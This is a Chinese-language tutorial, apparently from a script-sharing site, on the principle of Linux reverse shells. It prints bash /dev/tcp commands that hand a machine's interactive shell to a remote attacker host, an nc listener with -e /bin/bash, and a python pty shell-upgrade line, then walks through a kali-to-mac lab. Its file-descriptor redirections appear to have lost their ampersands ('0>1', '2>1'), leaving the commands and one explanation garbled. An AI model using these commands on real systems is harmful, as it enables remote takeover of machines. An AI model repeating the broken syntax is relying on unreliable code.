完整命令
反彈shell命令:
bash -i > /dev/tcp/10.0.0.1/8080 0>1
bash -i > /dev/tcp/ip/port 0>1 2>1
利用nc反彈shell:
nc -lvvp 12345 -t -e /bin/bash
原理
bash -i > /dev/tcp/ip/port 0>1 2>1
bash -i 打開一個(gè)交互式的bash
是為了區(qū)分文件1和文件描述符1的
a>b 的意思是 a>b 2>1
0代表輸入 ,0>1 意思是,將輸出的窗口上所輸入的值當(dāng)作當(dāng)前窗口的輸入。反彈shell后會有兩個(gè)窗口,即靶機(jī)的shell窗口跟攻擊機(jī)的shell口。這命令的意思也可以理解為,將攻擊機(jī)窗口的輸入當(dāng)作靶機(jī)窗口的輸入最終輸入給靶機(jī)。2代表標(biāo)準(zhǔn)錯(cuò)誤輸出。
實(shí)驗(yàn)
通過一個(gè)小實(shí)驗(yàn)幫助大家理解
第一步,將shell的正確輸出重定向到外部主機(jī)
假設(shè)我們在kali上輸入的命令為:
bash -i > /dev/tcp/192.168.124.1/9999
,這句話的意思是將交互式shell的標(biāo)準(zhǔn)輸出重定向到192.168.124.1的9999端口。
在mac上監(jiān)聽端口命令為:nc -l 9999
![](/d/20211017/43dc59eee4c59c87aa9e31fae3fe7c5d.gif)
首先在kali上輸入whoami命令,發(fā)現(xiàn)沒有回顯,因?yàn)榛仫@被重定向到了mac上。
![](/d/20211017/20afa2dfcbed1603ce4b6e02289a9cc4.gif)
但是當(dāng)我們在kali上出入錯(cuò)誤命令的時(shí)候,卻存在回顯。
![](/d/20211017/6ce75042c388c51fa1d4c741f4855f95.gif)
第二步,將錯(cuò)誤輸出重定向到外部主機(jī)
我們只需要在上面的命令后面加上 2>1即可,意思為將錯(cuò)誤輸出重定向到標(biāo)準(zhǔn)輸出上,也就是重定向到我們的外部主機(jī)。
![](/d/20211017/e22716066be482b06eda56bca21070e8.gif)
這時(shí)候發(fā)現(xiàn)在kali上按鍵盤已經(jīng)沒有任何回顯了,回顯全部出現(xiàn)在了mac的shell上:
![](/d/20211017/81483347fe47586d56db3255ec6f8fb6.gif)
這是因?yàn)槲覀円呀?jīng)將所有的輸出都重定向到了外部主機(jī)上,但問題是現(xiàn)在我們的控制權(quán)還在kali上,mac無法進(jìn)行任何輸出操作,只能顯示輸出。這時(shí)候我們幾句需要將輸入的權(quán)限給予我們的mac。
第三步,交出輸入權(quán)限
只需要在第二步命令的基礎(chǔ)上加上 0>1即可。
![](/d/20211017/b9ae7c43e673465947d0518c3899e0c3.gif)
這時(shí)候已經(jīng)可以在mac上完全控制kali的shell了,實(shí)驗(yàn)結(jié)束。
其他
當(dāng)shell不穩(wěn)定時(shí)候用python的虛擬化終端:
python -c "import pty;pty.spawn('/bin/bash')"
參考:
https://www.freebuf.com/news/142195.html #將shell轉(zhuǎn)換成完全tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017
到此這篇關(guān)于linux反彈shell的原理詳解的文章就介紹到這了,更多相關(guān)linux反彈shell內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
您可能感興趣的文章:- shell腳本語言的使用(超全超詳細(xì))
- Linux Shell腳本系列教程(二):終端打印命令詳解
- Linux shell傳遞參數(shù)實(shí)現(xiàn)原理及代碼實(shí)例
- shell腳本4種執(zhí)行方式
- 自己常用的一些shell腳本分享
- 入門shell腳本基礎(chǔ)及原理